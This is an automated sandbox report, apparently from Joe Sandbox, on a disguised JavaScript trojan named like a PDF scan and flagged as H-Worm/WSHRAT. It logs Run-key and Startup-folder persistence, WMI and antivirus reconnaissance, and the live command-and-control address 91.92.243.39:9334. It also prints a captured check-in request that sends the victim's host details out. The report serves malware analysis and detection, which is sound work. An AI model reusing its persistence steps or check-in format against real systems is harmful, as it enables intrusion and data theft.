    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.jsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.js\:Zone.Identifier:$DATA
    Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Scan_Revised-SOP_MCA_pdfJump to behavior
    Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Scan_Revised-SOP_MCA_pdfJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 59389 -> 9334
    Source: unknownNetwork traffic detected: HTTP traffic on port 59390 -> 9334
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsAPI name: ['getDate']
    Source: Scan_Revised-SOP_MCA_pdf.jsAPI name: ['getYear']
    Source: Scan_Revised-SOP_MCA_pdf.jsAPI name: ['getMonth']
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_LogicalDisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_LogicalDisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_LogicalDisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_LogicalDisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_LogicalDisk
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystemProduct
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_ComputerSystem
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.iniJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\wscript.exeNetwork Connect: 91.92.243.39 9334Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"Jump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusProduct

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information72
    Scripting
    Valid Accounts121
    Windows Management Instrumentation
    72
    Scripting
    111
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote ServicesData from Local System11
    Non-Standard Port
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job121
    Registry Run Keys / Startup Folder
    121
    Registry Run Keys / Startup Folder
    1
    Virtualization/Sandbox Evasion
    LSASS Memory12
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    DLL Side-Loading
    1
    DLL Side-Loading
    111
    Process Injection
    Security Account Manager1
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive1
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets113
    System Information Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Scan_Revised-SOP_MCA_pdf.js13%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://91.92.243.39:9334/is-readytrue
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      91.92.243.39
      unknownBulgaria
      34368THEZONEBGtrue
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1534155
      Start date and time:2024-10-15 16:37:59 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 7m 27s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:19
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • GSI enabled (Javascript)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Scan_Revised-SOP_MCA_pdf.js
      Detection:MAL
      Classification:mal100.troj.expl.evad.winJS@6/4@0/1
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .js
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: Scan_Revised-SOP_MCA_pdf.js
      TimeTypeDescription
      18:24:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Scan_Revised-SOP_MCA_pdf WScript.exe //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"
      18:24:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Scan_Revised-SOP_MCA_pdf WScript.exe //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"
      18:24:44AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.js
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      THEZONEBGna.elfGet hashmaliciousMirai, MoobotBrowse
      • 85.217.208.78
      m7DmyQOKD7.exeGet hashmaliciousRHADAMANTHYSBrowse
      • 91.92.255.109
      mipsel.nn.elfGet hashmaliciousOkiruBrowse
      • 91.92.246.113
      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
      • 91.92.246.113
      x86_32.nn.elfGet hashmaliciousOkiruBrowse
      • 91.92.246.113
      x86_64.nn.elfGet hashmaliciousOkiruBrowse
      • 91.92.246.113
      mips.nn.elfGet hashmaliciousOkiruBrowse
      • 91.92.246.113
      arm5.nn.elfGet hashmaliciousOkiruBrowse
      • 91.92.246.113
      arm.nn.elfGet hashmaliciousOkiruBrowse
      • 91.92.246.113
      0EAxNJFmWe.exeGet hashmaliciousAveMaria, UACMeBrowse
      • 91.92.250.115
      No context
      No context
      Process:C:\Windows\System32\wscript.exe
      File Type:ASCII text, with very long lines (1934)
      Category:dropped
      Size (bytes):1856335
      Entropy (8bit):4.545580309430983
      Encrypted:false
      SSDEEP:12288:UnTRSSvv3ZlOfPsqwmDNDqYHXqcZ1b1bJBq:UnUSH3ZlOPsqw0HXqcZ1pbJBq
      MD5:9839EE6DC614FDD0EFD3A37BFBD96FD7
      SHA1:2BF956BB382F6D5802C395410D9B7B01F320F7B0
      SHA-256:D79252AFA6F9727EA5BFD67E62C90F7D76BAF16A160CB87F2DD7B1EAC71F53D2
      SHA-512:0E360FBDF19333EAF985F742A65B03786CDC58482B4E54AC55BBC98762F94A6863BC776E3CDDFECEDB886B2454B43EAA2061ABEF9BC391C5E733C393CD83979F
      Malicious:true
      Reputation:low
      Preview:. function jbxlog() {. var str = ""; . try . {. for ( var i = 0 ; i < arguments.length ; i ++ ). {. var argKey = arguments[i][0]; . var argValue = arguments[i][1]; . var str2 = ""; . {. if ( argKey == "entry" ) . {. var info = jbxlog.countDic[argValue];. if (info === undefined). {. info = jbxlog.countDic[argValue] = { "totEntry": 1, "remEntry": jbxlog.countLimit - 1, "totExit": 0, "remExit": jbxlog.countLimit };. } else. {. info["totEntry"]++;. var remEntry = info["remEntry"] > 0 ? info["remEntry"]-- : 0;. if (remEntry === 0). {. return;. }. }. } else if ( argKey == "exit" ). {. var info = jbxlog.countDic[argValue];. if (info !== undefined). {. var to
      Process:C:\Windows\System32\wscript.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):26
      Entropy (8bit):3.95006375643621
      Encrypted:false
      SSDEEP:3:ggPYV:rPYV
      MD5:187F488E27DB4AF347237FE461A079AD
      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
      Malicious:true
      Reputation:high, very likely benign file
      Preview:[ZoneTransfer]....ZoneId=0
      Process:C:\Windows\System32\wscript.exe
      File Type:ASCII text, with very long lines (1934)
      Category:dropped
      Size (bytes):1856335
      Entropy (8bit):4.545580309430983
      Encrypted:false
      SSDEEP:12288:UnTRSSvv3ZlOfPsqwmDNDqYHXqcZ1b1bJBq:UnUSH3ZlOPsqw0HXqcZ1pbJBq
      MD5:9839EE6DC614FDD0EFD3A37BFBD96FD7
      SHA1:2BF956BB382F6D5802C395410D9B7B01F320F7B0
      SHA-256:D79252AFA6F9727EA5BFD67E62C90F7D76BAF16A160CB87F2DD7B1EAC71F53D2
      SHA-512:0E360FBDF19333EAF985F742A65B03786CDC58482B4E54AC55BBC98762F94A6863BC776E3CDDFECEDB886B2454B43EAA2061ABEF9BC391C5E733C393CD83979F
      Malicious:true
      Reputation:low
      Preview:. function jbxlog() {. var str = ""; . try . {. for ( var i = 0 ; i < arguments.length ; i ++ ). {. var argKey = arguments[i][0]; . var argValue = arguments[i][1]; . var str2 = ""; . {. if ( argKey == "entry" ) . {. var info = jbxlog.countDic[argValue];. if (info === undefined). {. info = jbxlog.countDic[argValue] = { "totEntry": 1, "remEntry": jbxlog.countLimit - 1, "totExit": 0, "remExit": jbxlog.countLimit };. } else. {. info["totEntry"]++;. var remEntry = info["remEntry"] > 0 ? info["remEntry"]-- : 0;. if (remEntry === 0). {. return;. }. }. } else if ( argKey == "exit" ). {. var info = jbxlog.countDic[argValue];. if (info !== undefined). {. var to
      Process:C:\Windows\System32\wscript.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):26
      Entropy (8bit):3.95006375643621
      Encrypted:false
      SSDEEP:3:ggPYV:rPYV
      MD5:187F488E27DB4AF347237FE461A079AD
      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
      Malicious:true
      Reputation:high, very likely benign file
      Preview:[ZoneTransfer]....ZoneId=0
      File type:ASCII text, with very long lines (26733), with CRLF line terminators
      Entropy (8bit):4.998937919223926
      TrID:
      • Java Script (8504/1) 100.00%
      File name:Scan_Revised-SOP_MCA_pdf.js
      File size:862'358 bytes
      MD5:2096293c16f715b0246fc2aea41499d1
      SHA1:a642e81761a8cd6c7f0226395ef96a99760ad797
      SHA256:e7c8bb8d112595f63ee19c4fc0f874322578e1a9bfbf180d182c6fe5d07e0221
      SHA512:c31aa5d51270ee5d6f2b872c6ced272c50aeb0be9dbf10b4c1e96c26daef8e327377daa1d080a6f4663397adb17e4d6383b0ab5697fb942d204053cb0adc9cce
      SSDEEP:3072:2IjUUgdxialmqLtVkjV7CzWaSZBGeiAQ7HheZ1OSb5P:XjUUg3jmqLAeiv9
      TLSH:04052720B6EC60C93AE3C2C4763356C8D8BDDA3A657894F5B516A402F0EE937C67D5B0
      File Content Preview:var _0x24962,_0x26688,_0x254C2,_0x2651C,_0x24907,_0x26466,_0x258AB,_0x278A9,_0x2629F,_0x252A0,_0x265D2,_0x25906,_0x2579A,_0x24D4B,_0x24B29,_0x270D7,_0x24F6D,_0x2773D,_0x25F6C,_0x25B28,_0x26CEE,_0x250D9,_0x27243,_0x26E5A,_0x25F11,_0x248AC,_0x27904,_0x24C3A
      Icon Hash:68d69b8bb6aa9a86
      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
      2024-10-15T16:38:51.387265+02002017516ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 11192.168.2.75939091.92.243.399334TCP
      2024-10-15T16:38:51.387265+02002017994ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA1192.168.2.75939091.92.243.399334TCP
      2024-10-15T16:40:56.347026+02002017516ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 11192.168.2.75938991.92.243.399334TCP
      2024-10-15T16:40:56.347026+02002017994ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA1192.168.2.75938991.92.243.399334TCP
      TimestampSource PortDest PortSource IPDest IP
      Oct 15, 2024 16:40:55.842111111 CEST593899334192.168.2.791.92.243.39
      Oct 15, 2024 16:40:55.847048998 CEST93345938991.92.243.39192.168.2.7
      Oct 15, 2024 16:40:55.847120047 CEST593899334192.168.2.791.92.243.39
      Oct 15, 2024 16:40:55.847415924 CEST593899334192.168.2.791.92.243.39
      Oct 15, 2024 16:40:55.852248907 CEST93345938991.92.243.39192.168.2.7
      Oct 15, 2024 16:40:56.346966982 CEST93345938991.92.243.39192.168.2.7
      Oct 15, 2024 16:40:56.347026110 CEST593899334192.168.2.791.92.243.39
      Oct 15, 2024 16:40:56.347433090 CEST593899334192.168.2.791.92.243.39
      Oct 15, 2024 16:40:56.352241039 CEST93345938991.92.243.39192.168.2.7
      Oct 15, 2024 16:41:02.469994068 CEST593909334192.168.2.791.92.243.39
      Oct 15, 2024 16:41:02.478441954 CEST93345939091.92.243.39192.168.2.7
      Oct 15, 2024 16:41:02.478624105 CEST593909334192.168.2.791.92.243.39
      Oct 15, 2024 16:41:02.478816032 CEST593909334192.168.2.791.92.243.39
      Oct 15, 2024 16:41:02.484255075 CEST93345939091.92.243.39192.168.2.7
      TimestampSource PortDest PortSource IPDest IP
      Oct 15, 2024 16:39:45.910145998 CEST5356721162.159.36.2192.168.2.7
      Oct 15, 2024 16:39:46.865078926 CEST53518301.1.1.1192.168.2.7
      • 91.92.243.39:9334
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.75938991.92.243.3993341916C:\Windows\System32\wscript.exe
      TimestampBytes transferredDirectionData
      Oct 15, 2024 16:40:55.847415924 CEST329OUTPOST /is-ready HTTP/1.1
      Accept: */*
      user-agent: B81A4609<|>user-PC<|>user<|>Microsoft Windows 10 Pro<|>Plus<|>Windows Defender .<|>false - 15/10/2024
      Accept-Language: en-ch
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      Host: 91.92.243.39:9334
      Content-Length: 0
      Connection: Keep-Alive
      Cache-Control: no-cache


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
